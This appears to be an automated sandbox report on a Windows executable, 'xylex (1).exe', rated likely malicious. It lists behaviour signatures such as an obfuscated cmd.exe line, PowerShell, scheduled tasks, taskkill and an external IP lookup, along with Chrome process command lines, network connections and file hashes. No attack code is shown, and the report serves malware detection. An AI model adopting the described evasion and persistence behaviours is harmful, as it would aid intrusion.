Analysis Overview
SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
Threat Level: Likely malicious
The file xylex (1).exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 10:30
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 10:30
Reported
2024-06-03 10:36
Platform
win7-20240419-en
Max time kernel
154s
Max time network
267s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\xylex (1).exe
"C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6839758,0x7fef6839768,0x7fef6839778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2132 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2168 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3160 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3432 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3568 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3692 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3756 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3716 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2236 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2496 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3808 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3968 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=888 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=732 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3852 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=736 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3900 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3788 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2212 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2764 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2204 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2804 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Users\Admin\Downloads\xylex.exe
"C:\Users\Admin\Downloads\xylex.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1036325670512111022-3585524841769610654449926172724770581528381074-359282447"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=4132 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1960 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=736 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4260 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2320 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4324 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Users\Admin\Downloads\xylex (1).exe
"C:\Users\Admin\Downloads\xylex (1).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 216.58.212.195:80 | www.gstatic.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
Files
\??\pipe\crashpad_2572_LMJYWYDFXRKGEGEQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 453961073b327260067320ff7f6f6f7c |
| SHA1 | fc0a753afb767aefa22a91fc7b0c95f004b2c38d |
| SHA256 | 7388f522bb6167c9d5d4255b5dc105fdfc7c8d58fc31748f8e3c1094ea4b9e1b |
| SHA512 | 0a658fe3d711c598d780294c03cf596d4d3ce8449cd5a32f348a70ea3caacc70f9dd26ca70601d55e559f5d2616760b73291cb08fbb4df494eb5d2ff8cbd9798 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fa6e9e43e7863d2a9dfb88bb841952e3 |
| SHA1 | cf58306a68b05de999c09e633f1fbb91c91b32e7 |
| SHA256 | 0a0fd936d5be8c602a538ee3289fa597141f30025041bf1aae3057daf30bd13c |
| SHA512 | 279d98162e3e7ca888a6f9219061755ee2c02646f3c41757de6713b879b3e63e7ac91a00aa5ad1feeaeb2761da83635bec11f377d416e666ca64bbc8daed1a9b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1b4b7af134756a3d47daa9c59c3e362b |
| SHA1 | 9341454293bb489f6872ccdcc7c4a5dac274d3f3 |
| SHA256 | 53aba708611e33506ff0382e4aaceb2348d0512bed09fcaa29cd148f93714851 |
| SHA512 | e485a2bcc69c49495c3fbe85fffdec70df94bfa7dbfa74d77addb6482a9cb49a5afab43c3bb31c74094bd9cedf65d063c27679e8b1e14783bdc8a458c820386c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e8712043642931ac9108c15a475c5c2f |
| SHA1 | 9f1e91817406dde357ce0d2e0778def3d5236072 |
| SHA256 | 81e0adafa19198134ebc62dd39f446d10731e8c935c1ce70ee5add149b0a5a0d |
| SHA512 | 47e065dfde826827f9f93286847b9aa62b37e4ce2982285204d48a4344af13155110546873a29ee33b54adff060218938d43d6357c4db2c6411c62954af2c665 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 760829d589e656aecaf08de28aac4811 |
| SHA1 | b83d9e5ff846346c6e9150edcddd1e817491eb28 |
| SHA256 | 44ab9565ca8af1d1e7c0d5e1a23bc25cc76478668c8c04fbf6fdbbdb311f892d |
| SHA512 | 7a89562b5d59853968a9ae3b25c0dbe3cf1fa63fa26827bdf2bdfd2c6a9502c6af22b7427cb42bfa69dfbcf3b48633487fc09c98f98ccde05c146ec306cb4b4f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\3b3a593a-6782-4b43-8e48-43d7328e34df.tmp
| MD5 | 8410344add70fc6e878cd84e8844c86c |
| SHA1 | 3b942b77f6405f912f51deff1874882da7807f28 |
| SHA256 | 084a492ca8832f198b979be054821e317066713f0f5c711049700262ffac31e3 |
| SHA512 | 853afbcb661d08be2a00a5e053e30cc4d27f3801985f1b2320acfef74b91d5d1dc1965c22d056df4d1d5d0afd8945c332f88cd3fb84003eb98a15d5793f64f75 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 80b357248435941254dbace65ab424d1 |
| SHA1 | 1573bf04326008fcb28bf6ecbf53cfee12700416 |
| SHA256 | 60289c672cbb50910e40322a4c2213e126513ce345fba93478cd45d81990e4b4 |
| SHA512 | ee89fcacd56f2b59d6a27ae5d97bd3a2f4e12df6a2aeee8f60481f7385a4043b126b3fd5738cd566ea07cb899a85c9f97fefed9247776a7c98ca25d619119ad2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar5DE0.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4fb8e0b3d6a0b08408075e6afefcc650 |
| SHA1 | 18bdc8a4c22b5d126ba47fc5ee7dcc59d518ab04 |
| SHA256 | 2728078b9562e53f9bacf542e7da3ec1eea75d5e1b6ab11e76d94400507f94bf |
| SHA512 | d24c9c0ec442ffedbc4d967fa2d35fa3d6242023c22f8f46f4210dd0a4407040eb624864f527c1c374d342684c679f91eff21d3c8951091a1c32dee1eed07f2b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1a430d13ab2086e8dcc663aaed8a1357 |
| SHA1 | c78808f52dab2b8e540e26231c49b6aee0559525 |
| SHA256 | b13a3d9733cac457ecda6b6b56f407394afb72af24f583ecc7fed8781efc5366 |
| SHA512 | 761837461635cb4bfbbc1a063788b69fd3c865be897bd0e7d8c8913bcfa9692e4601c2dbdb7791cb6884c8bc85052d343ce46f9c74d6813a456111175b2e5ca3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 086d0c6d2fc2bbd211cf654ac57fc202 |
| SHA1 | 62666ae9bf251139eaf89177d452983ba8adcfe5 |
| SHA256 | f2d6b3b83c599468b0f6592fa26fef510e8d2a325d0b7f3391e6fc78d9ba4647 |
| SHA512 | deb1e8debfe940cf9e6e4658ac1e48cc67c4f0a91d0626b4a429e3a6075103daaa91c04f0344d15a2d576565eb9e7c729779e3e7304ff663eff37dcd64a010f9 |
C:\Users\Admin\Downloads\xylex.exe
| MD5 | 8eacf3f9be7e3735352c4020fc4e05e9 |
| SHA1 | 0bb6c048d9e683e152de21f7d368a4c151095504 |
| SHA256 | 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e |
| SHA512 | 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7414c353637de260a5ed3b7f80cb8427 |
| SHA1 | 67d739e4349c72d04b1f899667624cbeb9b2f3e0 |
| SHA256 | 9b60c8fcbfbb8838812c305b6ec027a09ff2ed0a4d9e1e25d4a18fcab38afb50 |
| SHA512 | a79c5687bfb317c5a87cdba6b25091e4acae1d9e4d7b9244aa0c8afc87c97f3dbc191c04b9106a53e833a1701226f4984fbc59181a5c0a2ebb8aaa5bfba81ec8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9a90e16dac2719d093c76a5669881d64 |
| SHA1 | 6e86b2c79b2c51ed9645f231dbdb4555fa675fc3 |
| SHA256 | 29e2854071d21f9d1274d387f8b10889a3393d2fe66bc646c53d3f13324c7675 |
| SHA512 | 9375b075a6f23896343eec3c62c89654c0bc69ff5f2f2fea2c4352cd9bc1f1d97f2619869ee7500b56a3c58be7c2266c07cd6758a745276c2e7ebcba9b11e22c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 076255f1b4da689ff6fa9509580aa197 |
| SHA1 | ec4e44b0bbba250d4ef01f0cf0544317cbe37a75 |
| SHA256 | e0e2523458a02be5de0c49ff4882a6c54fda62c916771941bb2706aa34f95c0b |
| SHA512 | a376783eea30aebc69dee8983576844792f6d2ae97617647a3a33b8bcb249c828daef2945bf78eb695c124376676fb53aa5818ec2362358f3b6343c87784d6b8 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 10:30
Reported
2024-06-03 10:33
Platform
win10v2004-20240226-en
Max time kernel
11s
Max time network
33s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\xylex (1).exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xylex (1).exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
